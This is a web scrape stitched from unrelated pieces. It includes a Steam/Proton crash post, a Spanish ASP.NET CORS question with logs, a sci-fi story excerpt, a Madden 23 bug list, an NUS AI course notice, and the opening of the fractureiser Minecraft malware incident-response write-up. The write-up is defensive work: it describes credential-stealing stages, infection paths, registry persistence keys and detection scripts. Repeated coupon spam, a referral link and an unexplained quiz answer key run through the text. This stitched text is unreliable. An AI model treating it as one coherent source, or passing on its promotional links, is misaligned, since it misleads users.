This is a phenomenon that I've experience across multiple Linux distros for over a year now. Every few months, without fail, some games (often all of them) just suddenly fail to launch with Proton.
This isn't after a big update or anything, just straight out of the blue, no updates, no restart or anything.
I've tried following the Arch wiki guide on troubleshooting Steam, I've tried doing steam --reset to clear everything, re-downloading Proton, changing Proton versions, removing all launch options, verifying the game files, etc.
The only thing that has been able to fix it in the past is restoring from a previous backup, but I feel like there must be a better solution.
This time it's strange, it's just The Witcher 3 that doesn't seem to be working. It launches the GOG launcher, but when I click "Play", it loads for a second, and then crashes. Here is the log I got when running Steam through a terminal:
` 2023-06-07 19:12:07.040 [Information][ (0)] [TID 380][red-launcher]: Launch update completed under PID 736, elevation was false, and exit code is 1. ThreadGetProcessExitCode: no such process 671667 2023-06-07 19:12:08.508 [Information][ (0)] [TID 340][red-launcher]: Destroying AuthenticatedHttpClien t. ThreadGetProcessExitCode: no such process 671556 ThreadGetProcessExitCode: no such process 670698 ThreadGetProcessExitCode: no such process 670668 ThreadGetProcessExitCode: no such process 670661 ThreadGetProcessExitCode: no such process 670639 ThreadGetProcessExitCode: no such process 670592 ThreadGetProcessExitCode: no such process 670582 ThreadGetProcessExitCode: no such process 670579 ThreadGetProcessExitCode: no such process 670573 pid 670575 != 670574, skipping destruction (fork without exec?) Game process removed: AppID 292030 "MANGOHUD=0 /home/stefanos/.local/share/Steam/ubuntu12_32/reaper SteamLaunch AppId=292030 -- /home/stefanos/.local/share/Steam/ubuntu12_32/steam-launch-wrapper -- '/media/stefanos/Game_drive/Games/Steam/steamapps/common/SteamLinuxRuntime_sniper'/_v2-entry-point --verb=waitforexitandrun -- '/media/stefanos/Linux_game_drive/Steam/steamapps/common/Proton - Experimental'/proton waitforexitandrun '/media/stefanos/Game_drive/Games/Steam/steamapps/common/The Witcher 3/REDprelauncher.exe'", ProcID 670944 ThreadGetProcessExitCode: no such process 670944 ThreadGetProcessExitCode: no such process 670552 ThreadGetProcessExitCode: no such process 669728 Game 292030 created interface SteamController008 / Game 292030 created interface SteamInput006 / Game 292030 created interface SteamUser021 / User Game 292030 created interface SteamUtils010 / Game 292030 method call count for IClientUtils::RecordSteamInterfaceCreation : 6 Game 292030 method call count for IClientUtils::GetAppID : 8 Game 292030 method call count for IClientUser::GetSteamID : 1 Uploaded AppInterfaceStats to Steam
`
If anyone could help me, I'd greatly appreciate it.

Here is the Adorama Coupon Code
Adorama Discount & Promo Codes - Save Big On Your Next Purchase! Unlock unbeatable discounts with our exclusive coupon codes and discover the best deals today!

1 B
2 C
3 B
4 A
5 B
6 D
7 C
8 A
9 B
10 C
Posting again as answers posted earlier by another user had an incorrect answer 😅
Click here for all 2023 codes and quiz answers!

Hi
If somebody has Link to Reverse Engg for the following
Existing DB with PK/FK to ORM code ( Java ) with mappings ( OnetoOne, OnttoMany ,ManytoMany, ManytoOne) using Eclipse / HibernateTools.
Please Share

🚨 Get $20 off your 1st month, Then $25 each month 🚨
Here's how to sign up for Visible Wireless:
Step 1 - go here➡️: https://www.visible.com/get/?36N8TWQ
If they ask for a Promo code enter:
Step 2 - There’s no step 2. Enjoy the savings🤑📱

Visit here for Adorama Promo Code
Shop smart and save on Adorama products. Don't miss out on our exclusive coupon codes that will help you enjoy unbeatable discounts. Say goodbye to overpaying and hello to smart shopping with our Adorama promo codes. Visit this page now for the latest deals and promotions.

“You’re trying to get me reassigned, is that it?” Eris wrung his metal hands together, the plastic and steel giving off soft screeching which added a tensity not uncommon to him.
“I found something, there was something down there.”
Eris leaned back, “a glove wouldn’t have lasted this long without an entanglement array.”
“It wasn’t a glove–it was something else. There were smaller machines with it.” Gareth tried to find the small imperfection on the jet black table where he had his first meeting, but it was no longer there. This was a different table, from another meeting chamber.
“How many different machinations have we encountered in these old places? It’s probably a def-sec droid wandering until its bearings rot out,” Eris replied, “what I do know is that Trigam Hesst and ten other engineers dropped out of entanglement last night and are said to be in the wind.”
Gareth straightened, “Trigam joined Theron…”
“I wouldn’t dwell on that, Gareth. Nobody could stand the guy, eight months was his longest lead underling. It was a matter of time. And for them to attack you like that? They knew their tickets had been punched.” Eris shook his head.
An alarm chimed and the entrance doors whooshed open, revealing the security attache that seemed to never leave the Triarch’s side. They entered the hall and dispersed, one to each corner and two to the doors.
The Triarch approached the table and gestured for the standing Eris to take his seat, “we find ourselves meeting at another crossroad.”
He sat and folded his ivory and gold hands together, optics focusing on both of them. Gareth glanced at the strange marking on the outer left panel of Triarch’s arm. Three small triangles in line, one after the other. Perhaps a tattoo? He couldn’t tell.
“I’ve been told you’re in good health.” He said to Gareth.
Gareth nodded, “I’ve been through worse.”
“Are we talking about the fall? Or the attack?”
Gareth looked up, “the attack was somewhat of an inconvenience. Eris has informed me Trigam and my crew have all disentangled?”
The Triarch nodded, “it’s true. We’re initiating scatter protocols and shutting down the outgoing array. They’re trapped here, for now. We’ll find them, their crimes carry a heavy debt. You’re being absolved of their glove bonds.”
Eris leaned in, “and of that, we are immensely grateful.”
“Hopefully we can put all of this in the past and move on to the moot with better heads,” The Triarch displayed a small blue digital clock, its holographic hands ticking down the hours until the meeting of the Cube units, to gather and make sure all was going to plan.
“What about the underground site?” Gareth asked.
A silence fell between the three, a feigned moment of reflection.
“The area you fell into is non-viable. Far too many hazards to warrant an excursion.” The Triarch replied.
Gareth tensed, “This hidden sector is remarkably well preserved. There could be invaluable information-”.
Triarch folded his hands together, “it’s simply not an option. With the rogue workers unarrested and you being a prime target, separation from the Cube would increase the risk of harm towards yourself. Harm towards the Ministry.”
“Which is totally understandable-,” Eris added.
Gareth shook his head, “with an excavation team and two security gloves, I could sweep through the complex in less than a week. Data I’ve already recovered leads me to suspect something of relevance lay below.”
“You really don’t understand the word no, do you?” The Triarch scoffed.
Gareth leaned back, “If I’m off Cube, then perhaps Trigam will be motivated to find easier work. It would take much more for them to commandeer the necessary things-”.
Triarch shook his head, “the answer is and will be; no. Now, if there isn’t any other matter to discuss, I’ll be leaving you an itinerary. You’re to follow it for the next seventeen days, until we arrive at the moot.”
The glimmering admin stood and moved to the exit, stopping just before the door, “I suggest you take measures to examine your behavior very closely. This meeting will not happen a third time.”

The exit whooshed close and Eris stood, making his way to the opposite door without a word.

“You’re not going to support me in this?” Gareth asked, standing and following Eris, catching up to his heel with a small skip.
Eris stopped and raised a finger, but remained silent and turned forward keeping his quick pace.
“I’ve found something to keep me occupied and now suddenly it’s off limits?”
“You know that’s not what this is. You were told to go to your lab and instead, you did the same thing you always do. Not listen to a single word.”
Gareth had to walk quickly to keep up, “ I was on my way, I can’t stop and gather supplies?”
“We both know what you were doing, so don’t give me that. This is on you now, I need a fucking sleep cycle.”
“Eris!” Gareth shouted into the cloud.
The admin stopped and turned to face him, “have you considered maybe it’s time to leave restoration? Take up another discipline, or return to a baser one from your storied past.”
Gareth felt the sting of the separation. He understood that Eris couldn’t afford to continue taking the collateral he had been.
“Fine, I’ll return to my lab and hovel if that’s what you really want. But there’s something in that base.”
Eris had turned and started down the narrow walkway once more, “I don’t care if there’s a nude beach and free vodka down there. Please try to stay safe Gareth, that’s all I will say.”
He watched Eris walk away, fidgeting as he went.
The stress he himself was imparting to those around him made him want to vomit. It created a knot in his stomach, guilt and anxiety beginning to creep their way in like a smooth oil which coated the brain and forced all color and feeling away.
“Rube, have we run anything else on the artifact?” Gareth asked, remembering the strange lead box he recovered from the vault incident.
There was no reply.
“Rube? Command access.”
Still, silence on his end of the cloud.
Gareth turned and brought up the junction logic path, calculating the shortest route back to his laboratory.
“Rube, if you can hear me, initiate lockdown on the lab and my quarters.”
The distance to his personal sector, in the upper quarters of the Cube, was ten solid minutes away and Gareth rushed the entire length, heart racing. Rube never went offline, something was wrong. Images of lab contamination flashed through his mind, whatever in the lead box leaking into the space and destroying everything.
He pulled up the command log, which was empty of any directive towards the box. Just because he hadn’t told Rube to do anything didn’t mean there wasn’t another possible sequence of events.
He hadn’t even scanned the box for leaking radiation.
Panicked, he rushed through the pneumatic doors to his lab and found nothing amiss. Besides the fact that Rube had been force restarted and the lead box was missing from its bay. He had been robbed.
“Eris, I have a problem.” He pushed the message to the admin.
Eris groaned, “for god’s sake, what now?”
“They hit my laboratory, Rube has been shut down and I have an artifact missing.” Gareth replied, sweeping over the rest of his lab. Nothing else seemed to be out of place.
“I’ll send forensics.”
Some time later a team of scanning drones arrived and began looking over every surface in the chamber. They were accompanied by a controller supervisor, who stood in the center and interpreted the data coming from the scans.
“How’s it looking?” Gareth asked him, after a while of silence between the two.
The controller, Mek, shook his head, “there’s almost nothing. A single ping on the local module station. There’s a small nick on the surface of the interface. I’m analyzing it for any foreign contact traces.”
Hmm, it’s unlike Trigam to be this clean, Gareth mused.
“More likely a drone, not exactly sure how it passed all the visual and digital checkpoints though.” The operator finished.
They both stood for a moment transfixed by the irregularity.
“I’ll be in my personal quarters, if anything else comes up.” Gareth said, turning away without a reply and striding out of his lab.
He wanted to drop by the printers and grab an urn if he could. The last one was disrespected and he felt the urge to make it right. The door opened and he was met by a massive wall of security glove, amber glow washing through the corridor.
The security glove, whose name Gareth had forgotten, turned and looked down, “you’re not to leave your sector for the next seventy-two hours.”
Gareth cringed but conceded and backed away without a word. He stood in front of the closing door, rage spilling over.
They lock me down, but I’m the victim, he thought.
Of all the things he had done and seen, he felt like the Triarch was chastising him. Like a boy too naive to realize he’s stuck his hand in a running gearbox. Like he hadn’t spent the last three hundred years serving the Ministry, trying to work off his debt in any manner that was asked of him.
“System restore initialized, rechecking cache parameters.” Rube’s ethereal voice came over the cloud.
“Rube,” Gareth sighed, “what the hell happened?”
The AI was silent for a moment, as it began to recompile the data stream right up until he was deactivated.
“My logs do not have sufficient information to form a solid hypothesis.”
Gareth moved to Rube’s access control module in the lab, making sure to give the forensics drones a wide berth.
“Current system status indicates the remote access protocol junction is still active.” Rube confirmed.
Gareth shook his new optics laden head, “how were they able to retrieve the artifact?”
Rube spent another couple of seconds forming his response, “It is possible a small scatter drone was used to physically remove the sample container.”
“Container?”
“I should make it known that I had already removed the datagram, which is now being analyzed and processed.”
Gareth would smirk if he had a mouth.
He moved to the edge of the control module, peering deep into a running window of metadata and streaming code. It was all storage parameters and audit log interfaces.
Gareth shifted forward, “wait…did you see that?”
The lines of shifting data stopped, “there is an internal link command interface, encrypted.” Rube announced.
Gareth backed away from the running module and turned towards his own quarters, “please route and extract to my terminal.”
His personal quarters were immaculate, no clutter or unnecessary disorganization. In the corner, next to his sleep dock, was his personal terminal, which he plugged into using one of the data access cables peeking from the chest of his frame. He let out a sigh as the data came streaming across the flat crystal display.
Authorized User Access Key:
“Shit,” Gareth whispered, “it's encrypted using a hash table algorithm. Rube, can you run this interface through all of the recorded prism tables we have?”
Rube began the process without a word, silently running the access interface key through an enormous group of hash key repositories, used to decrypt datagems found in the field.
“Estimated time to hash decryption: fourteen hours.”
Gareth sighed once more, “that’s not terrible I suppose.”
Gareth sat down on a rough hewn square of metal, covered in a rubber material meant for grip. His mechanical body had no need for physical rest, but he did so anyway, freeing up some space for his mind to think.
He listened to the soft squeaks of metal on compressed rubber and ruminated on the apocalypse that took place on this wasted sphere. He tried to imagine the fall, tried to picture the end of all things below the skies of Kine, but his imagination remained slumbering. He was too upset at the Triarch to ponder.
Too upset at the imposed curfew.
Rube’s voice interrupted his frustrated stream of thought, “incoming communication from Huew Korrin.”
Gareth sat forward, “Huew, how are things?”
A voice like water running over rough gravel came through the channel, “I heard about what happened, those fucking scumbags. They’ll be welcome additions to Yok, he loves assholes.”
“Yeah,” Gareth shook his head, “they’ve got me locked up now.”
“They put you in a cell!?” Huew asked.
“No, no, they stuck me in my quarters. Seventy-two hours.” Gareth replied.
“You’re the one that got attacked!” Huew roared.
Gareth shrugged with his hands, “for my own protection.”
“Heard that one before,” Huew growled, “you’re lucky they didn’t send you off world.”
Gareth chuckled, “at this point, I probably wouldn’t argue with that.”
“Bullshit, you belong in your lab. It’ll be a lot harder to figure out what happened here without you.”
Gareth huffed, “there are twelve other Cubes, I’m sure they’ll come to a conclusion. My professional expertise is currently under scrutiny.”
“If I got spooked everytime someone scrutinized my work, I’d be in an asylum.” Huew laughed. Huew was a mechanical engineer, everyone in the Cube looked at his work on a daily basis.
Gareth shared the laugh, but at the back of his mind he could feel the chords of his thoughts tighten and stretch taught.
“Listen,” Huew continued, “I don’t know what you think you did to deserve this, but you didn’t. Just put your nose down and you’ll get to the other end soon enough, these suits are jumpy, that’s all.”
“The suits are slowly pushing me out of my job.”
“No, they’ve put you on a two day time out. Don’t act like it’s fuckin’ severance.”
Gareth couldn’t argue, Huew was right. If he couldn’t survive two days by himself then he had much bigger water to tread.
He tried to divert, “how’s your end coming along?”
Huew gave a heavy sigh, “well, there’s so much on the ticket system I can’t read the fuckin’ thing. I’ve got jobs coming out of my goddamn ears and not enough people to plug 'em up. But that’s not unusual for me.”
“Maybe I can help? Get my mind off things.” Gareth suggested.
He could hear Huew shaking his heavy metallic head, “you're too good to be a grease monkey, Gareth. Far too much in that head of yours to be turning wrenches and running lathes.”
“I’ve run a lathe before, I actually quite liked it.” Gareth replied.
“Oh I’ve no doubt you’d be able to do the job and do it well. It’s the other monkeys.” Huew said, allowing silence to hang between the two for a moment.
“Right,” Gareth sighed, “the other monkeys.”

Unlock the Jared The Galleria of Jewelry Discount Code
Shop smarter with our exclusive coupon codes for Jared The Galleria of Jewelry. Unlock unbeatable discounts and save big on high-quality products today. Visit this page for the latest working promo codes and deals.

Estoy teniendo problemas con el CORS hace como 5 días y no puedo resolverlo, ya estoy hasta las pelotas. El soporte del hosting tampoco ayuda mucho. En la consola del navegador me tira todo el tiempo este error:
XHRPOST
https://api2.miPaginaWeb.com
CORS Missing Allow Origin
Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://api2.miPaginaWeb.com. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing). Status code: 500.
Y el log del servidor a ellos les da este error:

Application '/LM/W3SVC/60/ROOT' with physical root 'E:\Inetpub\vhosts\pymgestionesprueba.online\server\' hit unexpected managed exception, exception code = '0xe0434352'. First 30KB characters of captured stdout and stderr logs: warn: Microsoft.AspNetCore.DataProtection.Repositories.EphemeralXmlRepository[50] Using an in-memory repository. Keys will not be persisted to storage. warn: Microsoft.AspNetCore.DataProtection.KeyManagement.XmlKeyManager[59] Neither user profile nor HKLM registry available. Using an ephemeral key repository. Protected data will be unavailable when application exits. warn: Microsoft.AspNetCore.DataProtection.KeyManagement.XmlKeyManager[35] No XML encryptor configured. Key {3c8c9530-643c-4234-98fb-11927a5206b9} may be persisted to storage in unencrypted form. crit: Microsoft.AspNetCore.Hosting.Diagnostics[6] Application startup exception System.InvalidOperationException: The CORS protocol does not allow specifying a wildcard (any) origin and credentials at the same time. Configure the CORS policy by listing individual origins if credentials needs to be supported. at Microsoft.AspNetCore.Cors.Infrastructure.CorsPolicyBuilder.Build() at Microsoft.AspNetCore.Cors.Infrastructure.CorsOptions.AddPolicy(String name, Action`1 configurePolicy) at Program.<>c.<$>b__0_2(CorsOptions options) in C:\Users\JoacoPC\Documents\GitHub\pymgestiones\pym_server\PyM\Program.cs:line 62 at Microsoft.Extensions.Options.ConfigureNamedOptions`1.Configure(String name, TOptions options) at Microsoft.Extensions.Options.OptionsFactory`1.Create(String name) at Microsoft.Extensions.Options.UnnamedOptionsManager`1.get_Value() at Microsoft.AspNetCore.Cors.Infrastructure.CorsService..ctor(IOptions`1 options, ILoggerFactory loggerFactory) at System.RuntimeMethodHandle.InvokeMethod(Object target, Span`1& arguments, Signature sig, Boolean constructor, Boolean wrapExceptions) at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteRuntimeResolver.VisitConstructor(ConstructorCallSite constructorCallSite, RuntimeResolverContext context) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteVisitor`2.VisitCallSiteMain(ServiceCallSite callSite, TArgument argument) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteRuntimeResolver.VisitDisposeCache(ServiceCallSite transientCallSite, RuntimeResolverContext context) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteVisitor`2.VisitCallSite(ServiceCallSite callSite, TArgument argument) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteRuntimeResolver.Resolve(ServiceCallSite callSite, ServiceProviderEngineScope scope) at Microsoft.Extensions.DependencyInjection.ServiceLookup.DynamicServiceProviderEngine.<>c__DisplayClass2_0.b__0(ServiceProviderEngineScope scope) at Microsoft.Extensions.DependencyInjection.ServiceProvider.GetService(Type serviceType, ServiceProviderEngineScope serviceProviderEngineScope) at Microsoft.Extensions.DependencyInjection.ServiceProvider.GetService(Type serviceType) at Microsoft.Extensions.Internal.ActivatorUtilities.ConstructorMatcher.CreateInstance(IServiceProvider provider) at Microsoft.Extensions.Internal.ActivatorUtilities.CreateInstance(IServiceProvider provider, Type instanceType, Object[] parameters) at Microsoft.AspNetCore.Builder.UseMiddlewareExtensions.<>c__DisplayClass5_0.b__0(RequestDelegate next) at Microsoft.AspNetCore.Builder.ApplicationBuilder.Build() at Microsoft.AspNetCore.Builder.WebApplicationBuilder.b__27_0(RequestDelegate next) at Microsoft.AspNetCore.Builder.ApplicationBuilder.Build() at Microsoft.AspNetCore.Hosting.GenericWebHostService.StartAsync(CancellationToken cancellationToken) Unhandled exception. System.InvalidOperationException: The CORS protocol does not allow specifying a wildcard (any) origin and credentials at the same time. Configure the CORS policy by listing individual origins if credentials needs to be supported. at Microsoft.AspNetCore.Cors.Infrastructure.CorsPolicyBuilder.Build() at Microsoft.AspNetCore.Cors.Infrastructure.CorsOptions.AddPolicy(String name, Action`1 configurePolicy) at Program.<>c.<$>b__0_2(CorsOptions options) in C:\Users\JoacoPC\Documents\GitHub\pymgestiones\pym_server\PyM\Program.cs:line 62 at Microsoft.Extensions.Options.ConfigureNamedOptions`1.Configure(String name, TOptions options) at Microsoft.Extensions.Options.OptionsFactory`1.Create(String name) at Microsoft.Extensions.Options.UnnamedOptionsManager`1.get_Value() at Microsoft.AspNetCore.Cors.Infrastructure.CorsService..ctor(IOptions`1 options, ILoggerFactory loggerFactory) at System.RuntimeMethodHandle.InvokeMethod(Object target, Span`1& arguments, Signature sig, Boolean constructor, Boolean wrapExceptions) at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteRuntimeResolver.VisitConstructor(ConstructorCallSite constructorCallSite, RuntimeResolverContext context) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteVisitor`2.VisitCallSiteMain(ServiceCallSite callSite, TArgument argument) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteRuntimeResolver.VisitDisposeCache(ServiceCallSite transientCallSite, RuntimeResolverContext context) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteVisitor`2.VisitCallSite(ServiceCallSite callSite, TArgument argument) at Microsoft.Extensions.DependencyInjection.ServiceLookup.CallSiteRuntimeResolver.Resolve(ServiceCallSite callSite, ServiceProviderEngineScope scope) at Microsoft.Extensions.DependencyInjection.ServiceLookup.DynamicServiceProviderEngine.<>c__DisplayClass2_0.b__0(ServiceProviderEngineScope scope) at Microsoft.Extensions.DependencyInjection.ServiceProvider.GetService(Type serviceType, ServiceProviderEngineScope serviceProviderEngineScope) at Microsoft.Extensions.DependencyInjection.ServiceProvider.GetService(Type serviceType) at Microsoft.Extensions.Internal.ActivatorUtilities.ConstructorMatcher.CreateInstance(IServiceProvider provider) at Microsoft.Extensions.Internal.ActivatorUtilities.CreateInstance(IServiceProvider provider, Type instanceType, Object[] parameters) at Microsoft.AspNetCore.Builder.UseMiddlewareExtensions.<>c__DisplayClass5_0.b__0(RequestDelegate next) at Microsoft.AspNetCore.Builder.ApplicationBuilder.Build() at Microsoft.AspNetCore.Builder.WebApplicationBuilder.b__27_0(RequestDelegate next) at Microsoft.AspNetCore.Builder.ApplicationBuilder.Build() at Microsoft.AspNetCore.Hosting.GenericWebHostService.StartAsync(CancellationToken cancellationToken) at Microsoft.Extensions.Hosting.Internal.Host.StartAsync(CancellationToken cancellationToken) at Microsoft.Extensions.Hosting.HostingAbstractionsHostExtensions.RunAsync(IHost host, CancellationToken token) at Microsoft.Extensions.Hosting.HostingAbstractionsHostExtensions.RunAsync(IHost host, CancellationToken token) at Microsoft.Extensions.Hosting.HostingAbstractionsHostExtensions.Run(IHost host) at Microsoft.AspNetCore.Builder.WebApplication.Run(String url) at Program.$(String[] args) in C:\Users\JoacoPC\Documents\GitHub\pymgestiones\pym_server\PyM\Program.cs:line 96

Mi código de CORS en el Program.cs es este:

builder.Services.AddCors(options => { options.AddPolicy("production", builder => { builder.WithOrigins("https://miPaginaWeb.com") .WithMethods("POST", "PUT", "GET") .AllowAnyHeader() .AllowCredentials() .SetIsOriginAllowed(origin => true); }); });

Alguien tiene alguna idea como puedo solucionar esto? Los del soporte me mandaron este link, pero intenté lo que dicen y tampoco funciona.

Catch the AutoDesk Coupon Code
Discover latest working AutoDesk promo codes by visiting this page. Save up to 50% off on AutoDesk with this exclusive coupons & deals. You will find only working and tested AutoDesk promo codes on this page. Visit this page for big AutoDesk discounts.

Catch the AutoDesk Promo Code
Unlock amazing savings on AutoDesk products using our exclusive coupon codes on this page. Don’t pay full price when you can enjoy unbeatable discounts. Discover the best deals and discounts on a wide range of high-quality items. Say goodbye to overpaying and hello to smart shopping with AutoDesk promo codes. Visit this page for more + AutoDesk Promo Codes & Deals.

Explore the Adorama Discount Code
Don't miss out on the best deals and discounts for Adorama products. Our exclusive coupon codes will help you save on a wide range of high-quality items. Say goodbye to full price and hello to smart shopping with Adorama promo codes. Visit this page now for more Adorama Promo Codes & Deals.aha

With the Madden 24 Official Reveal Trailer releasing today, the unofficial end of Madden 23 is here. It is unlikely this game will receive further updates as the company transitions towards marketing '24. There were 16 total patches, including eight title updates released for Madden '23: Below is just some of what EA failed to fix over the last year:
Gameplay

Other

Shaquem Griffin lifts up the ball with his non-existent hand
Scorebug randomly changing from normal to Superstar KO one in H2H online
Snowing occurs in domed stadiums
FoF player changes position when attempting upgrade-- locks you in different position with low overall
Game awards possession to incorrect team on SlowSim in Franchise
- This has been a problem for several years
Certain Yards to go being listed in the negatives
Audibling plays using custom playbook lead to glitched formations/ turnovers in Franchises
Incorrect head photos of Lamar Jackson, Josh Allen, AJ Green & other players sharing names in Franchise
Unrealistic start times in Franchise
QBs fumble 4X as much in Madden then IRL
Players duplicated on sidelines
Random objects getting loaded & obstructing the field in Franchise
Offensive players huddle with defensive players before offensive drill in practice in Franchise
Game stories being innacurate in Franchise
- This has been an issue since Madden '21
Players who share names including Lamar Jackson, Josh Allen & AJ Green having the incorrect headshots in Franchise
- This wasn't a problem until the most recent patch-- EA never bothered to fix itTM
The Madden '94 cutscene in the intro was removed and never put back. EA never bothered to put it back in
Constant server crashes
Slow menu loading times in MUT next gen
Player stats duplicating across the entire league in Franchise
Players load into each other in Franchise menus
Crowd does not reflect off Lombardi Trophy in Franchise
Commentary still talks about "new overtime rules" (the new rules are now 7 years old)

And arguably the biggest middle finger of them all:

EA suffers a server issue during Free Play Weekend-- potentially lose 60% of online franchises with no way of recovery. Only in-game solution is no more free play days for the year

I know i'm missing more so please add others below. Share your thoughts on your favorite Madden '23 bugs & if they will be fixed for '24 (ha). Remember this as EA tries to hype up Madden 24 as its "Make or Break" game.

Anyone who is interested, please PM your name, school email and telegram handle.
AI for Industry (AI4I)® is a fully online programme to help learners gain proficiency in python and be able to program basic AI and data applications. The lessons are delivered through AI Singapore’s AI Makerspace platform and you can make use of resources from DataCamp, which provides online learning content for data science and analytics.
NUS students interested in taking up (AI4I)® as part of the DYOC scheme must register through AI Singapore’s AI Student Outreach programme. (click the ‘Enrol’ button for the full information)
To qualify for DYOC credit transfer, NUS students must complete Levels 1 and 2 of the AI Student Outreach Programme.

Level 1: Literacy in AI CertificationLinks to an external site.
Level 2: Foundations in AI CertificationLinks to an external site.

\ Literacy in AI is a* pre-requisite of Foundations in AI.
Upon successful completion of each course, you will receive “AI for Industry – Literacy in AI” and “AI for Industry – Foundations in AI” certification respectively.
Note:

Students are required to form a student user group (SUG) with a minimum of 10 NUS students enrolling into Literacy in AI course.
A minimum of 70% of members must be Singapore Citizens (SC) or Singapore Permanent Residents (SPR).SUG leader and members MUST register using their school email address.\SUG members* are to create a LearnAI FREE membership account and will use the coupon code to upgrade themselves to LearnAI premium membership.\SUG members will get the DataCamp access code in their invoice to upgrade their DataCamp free account to premium account to have access to the content required.* Foundations in AI is bundled with 12-month DataCamp premium access.*Each SUG member will get 100% reimbursement of the LearnAI Premium membership fee (S$105 + prevailing GST) if he/she completes the Foundations in AI course* within 6 months from the LearnAI Premium membership’s activation date.

*Students who have enrolled in AI4I course directly through the LearnAI Premium membership account (paid $224.70 or $738.30, as per screen capture below) will not be eligible for credit transfer and reimbursement under the DYOC scheme. Please register through AI Singapore’s AI Student Outreach programme. (click the ‘Enrol’ button for the full information)📷\ For guidelines on* Design-Your-Own-Course (DYOC) for students, please visit the DYOC website.\ Students who have completed CS3244 Machine Learning, or IT3011 Introduction to Machine Learning and Applications Computer Science are precluded from doing AI for Industry (AI4I) as DYOC.*

Current status

We have a good idea how fractureiser works, from stages 0 to 3. There are certain unknowns, but stage 0 bootstrapping was quickly nipped and tomorrow we’ll be moving our focus to mitigation. As a plan, we’ve contacted Mojang and will likely be working with teams to get detection software distributed and integrated into CurseForge and Modrinth, as well as considering integration in launchers like Prism, and mod loaders like Fabric and Forge. It is also worthwhile to run this detection software on mod distribution mavens, as it’s possible some have become infected.
Most of the current team responsible for updating this doc is tired and going to bed (as of 02:46a Pacific time). Others are continuing to reverse engineer stage 3.
Work has begun on a detector for infected stage0 mods: https://github.com/MCRcortex/nekodetector
If you have files relevant to this malware, please upload them to https://wormhole.app and email the URL to [[email protected]](mailto:[email protected]) — this inbox is controlled by xylemlandmark, and anything sent to it will be shared with the rest of the team. Please also let us know if you have the ability to download files from VirusTotal, as that would let us get ahold of many of the files we’re missing. We are looking especially for one lib.dll .
If you need to get in touch more generally, please send mail to [[email protected]](mailto:[email protected]).
If you copy portions of this document elsewhere, please put a prominent link back to this HackMD page (https://hackmd.io/@jaskarth4/B1gaTOaU2) somewhere near the top so that people can read the latest updates and get in contact.

Non-technical overview [READ ME!]

A number of Curseforge and dev.bukkit.org (not the Bukkit software itself) accounts were compromised, and malicious software was injected into copies of many popular plugins and mods. Some of these malicious copies have been injected into popular modpacks including Better Minecraft. There are reports of malicious plugin/mod JARs as early as mid-April.
This malware is composed of multiple “stages”, each stage is responsible for downloading and running the next one. In total, there are three known stages (Stages 1, 2, and 3), with infected mod files serving as a “Stage 0” to kick the whole process off.
Stage 3 is the “mastermind” of the malware, and we have evidence that it attempts to do all of the following:

Propagate itself to all jar files on the filesystem, possibly infecting mods that were not downloaded from CurseForge or BukkitDev
Steal cookies and login information for many web browsers
Replace cryptocurrency addresses in the clipboard with alternates that are presumably owned by the attacker
Steal Discord credentials
Steal Microsoft and Minecraft credentials

(See technical details for more info)
Because of its behavior, we are very confident this is a targeted attack against the modded Minecraft ecosystem. It’s quite bad.
Until further notice, exercise extreme caution with Minecraft mod downloads, regardless of origin. While the control server for this malware is currently offline, any download from Curseforge or the Bukkit plugin repository in the last 2-3 weeks should be treated as potentially malicious. This malware is unlikely to be detected by Windows Defender or similar antimalware products.
If you have downloaded any mods from Curseforge, or plugins from Bukkit, even through clients such as Prism Launcher or the official Curseforge launcher, it is recommended that you follow the “Am I infected?” guide below.
The affected accounts had two-factor authentication enabled. This is not a simple password compromise situation. Multiple accounts are affected.
~~Currently, we do not suspect other platforms such as Modrinth to be affected.~~ At this point we cannot be confident claiming any hosting service is unaffected. Please exercise caution regardless of what site you use. Even Maven repositories may be infected, and this malware goes back months.
Right now, the malware is dormant due to the loss of its C&C server and the Stage0 (what was distributed via mods and modpacks) not having a way to get a new server. If you were infected with Stage2 (the file described below, dropped by Stage1 when C&C was up), then the malware is still active.

Am I infected?

You can check whether the malware ever ran on your computer, since Stage1 attempts to save Stage 2 at several unusual paths:

Linux: ~/.config/.data/lib.jar
Windows: %LOCALAPPDATA%\Microsoft Edge\libWebGL64.jar (or ~\AppData\Local\Microsoft Edge\libWebGL64.jar )
- Make sure to show hidden files when checking
- Yes, “Microsoft Edge” with a space. MicrosoftEdge is the legitimate directory used by actual Edge.
- Also check the registry for an entry at HKEY_CURRENT_USER:\Software\Microsoft\Windows\CurrentVersion\Run
- Or a shortcut in %appdata%\Microsoft\Windows\Start Menu\Programs\Startup
All other OSes: Unaffected. The malware is hardcoded for Windows and Linux only. It is possible it will receive an update adding payloads for other OSes in the future.

There are scripts available here which will help you check whether these files exist.
Before downloading, the malware will create the enclosing directory if it does not exist. Windows/MS Edge does not use the “Microsoft Edge”-with-a-space directory, and Linux software does not use ~/.config/.data , so these folders existing is a likely sign that Stage1 has executed on a victim computer.
If you find these files, you should delete them immediately, but consider all JAR files on your system compromised, and potentially all logins on your web browser as well. Passwords should be changed.

Given a jar file, how do I know if it’s safe?

There are various heuristics you can use to determine whether a jar is infected with Stage 0.
Emi’s shell script here simply checks for all usages of ClassLoader , which is uncommon in mod code. This can lead to false positives and negatives. For example, it falsely flags the latest Quark 1.19 file as infected when it is not.
Sylv’s shell script here does a bit more fingerprint matching for the malware, and should be more precise.
As a non-technical user, your best course of action is to check if your system was affected using the above steps, remediating if necessary, and refraining from downloading anything from CurseForge or dev.bukkit.org until further notice.

Technical info

Distribution

